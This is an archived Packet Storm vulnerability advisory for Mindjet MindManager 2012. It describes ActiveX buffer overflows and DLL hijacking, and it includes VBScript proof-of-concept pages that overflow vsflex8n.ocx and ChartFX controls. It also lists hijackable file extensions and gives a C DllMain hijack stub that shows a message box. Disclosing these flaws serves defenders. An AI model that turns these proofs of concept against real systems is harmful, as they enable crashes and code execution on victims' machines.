what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Mindjet MindManager 2012 10.0.493 Buffer Overflow / Denial Of Service

Mindjet MindManager 2012 10.0.493 Buffer Overflow / Denial Of Service
Posted Jan 31, 2012
Authored by LiquidWorm | Site zeroscience.mk

Mindjet MindManager 2012 version 10.0.493 suffers from buffer overflow and denial of service vulnerabilities.

tags | exploit, denial of service, overflow, vulnerability
SHA-256 | b50eec5a80d46febd6c5ebb66680d9b098509d98e414986b60dc5cb207e949e1

Mindjet MindManager 2012 10.0.493 Buffer Overflow / Denial Of Service

Change Mirror Download

Mindjet MindManager 2012 v10.0.493 Multiple Remote Vulnerabilities


Vendor: Mindjet
Product web page: http://www.mindjet.com
Affected version: 10.0.493 (Windows)

Summary: An intuitive visual framework that fosters clarity,
innovative thinking & communication to improve business results.

Desc: MindManager suffers from several vulnerabilities included
into the whole package. Several OCX and DLL libraries from 3rd
party software (glg.ocx, officeviewermme.ocx, pdfxctrl.dll, vsflex8n.ocx
and ChartFX.ClientServer.Core.dll) are vulnerable to buffer overflow
and denial of service (IE). Also the application is vulnerable to insecure
library loading with every file extension thru ssgp.dll and dwmapi.dll.

Tested on Microsoft Windows XP Professional SP3 (EN)


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2012-5068
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5068.php


Other vulnerabilities:

http://www.exploit-db.com/exploits/12673/
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5067.php
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5069.php


25.01.2012

---


<object classid='clsid:74233DB3-F72F-44EA-94DC-258A624037E6' id='target' />
<script language='vbscript'>

targetFile = "C:\Program Files\Mindjet\MindManager 10\vsflex8n.ocx"
prototype = "Sub Archive ( ByVal ArcFileName As String , ByVal FileName As String , ByVal Action As ArchiveSettings )"
memberName = "Archive"
progid = "VSFlex8N.VSFlexGrid"
argCount = 3

arg1=String(7188, "A")
arg2="defaultV"
arg3=1

target.Archive arg1 ,arg2 ,arg3

</script>

############

CompanyName ComponentOne
FileDescription VSFlexGrid8 (UNICODE)
FileVersion 8, 0, 20031, 172
InternalName
LegalCopyright Copyright 1999, 2002 ComponentOne
OriginalFileName VSFlex8u.OCX
ProductName VSFlexGrid8
ProductVersion 8, 0, 20031, 172

Report for Clsid: {74233DB3-F72F-44EA-94DC-258A624037E6}
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data

############

------------------------------


<object classid='clsid:E9DF30CA-4B30-4235-BF0C-7150F646606C' id='target' />
<script language='vbscript'>

targetFile = "C:\Program Files\Mindjet\MindManager 10\ChartFX.ClientServer.Core.dll"
prototype = "Property Let TipMask As String"
memberName = "TipMask"
progid = "Cfx62ClientServer.Chart"
argCount = 1

'arg1=String(13332, "A")
target.TipMask = arg1

</script>


############

CompanyName Software FX, Inc.
FileDescription ChartFX Client Server
FileVersion 6.2.2089.27167
InternalName ChartFX.ClientServer.Core.dll
LegalCopyright Copyright 1993-2005 Software FX, Inc.
OriginalFileName ChartFX.ClientServer.Core.dll
ProductName ChartFX Client Server
ProductVersion 6.2

Report for Clsid: {E9DF30CA-4B30-4235-BF0C-7150F646606C}
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data



Vulnerable members
--------------------
Function HitTestEx (
ByVal X As Long ,
ByVal Y As Long
) As _MouseEventArgsX

# vuln var: Y, X

-------------------------------------------
Sub OpenData (
ByVal COD As COD ,
ByVal n1 As Long ,
ByVal n2 As Long
)

# vuln var: n1, n2

-------------------------------------------
Sub ShowPropertiesDialog (
ByVal context As Variant ,
ByVal pageNumber As Long
)

# vuln var: pagenumber

-------------------------------------------

############

------------------------------

DLL Hijack:

Vulnerable extensions:
- .mmap
- .xmmap
- .xml
- .mmp
- .mmat
- .xmmat
- .mmpt
- .mmmp
- .xmmmp
- .mmas
- .xmmas
- .docx
- .dotx
- .doc
- .dot
- .mpx

(ssgp.dll / dwmapi.dll)

---

#include <windows.h>

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
dll_mll();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}

return TRUE;
}

int dll_mll()
{
MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}

------------------------------
Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    15 Files
  • 28
    Jun 28th
    14 Files
  • 29
    Jun 29th
    11 Files
  • 30
    Jun 30th
    7 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close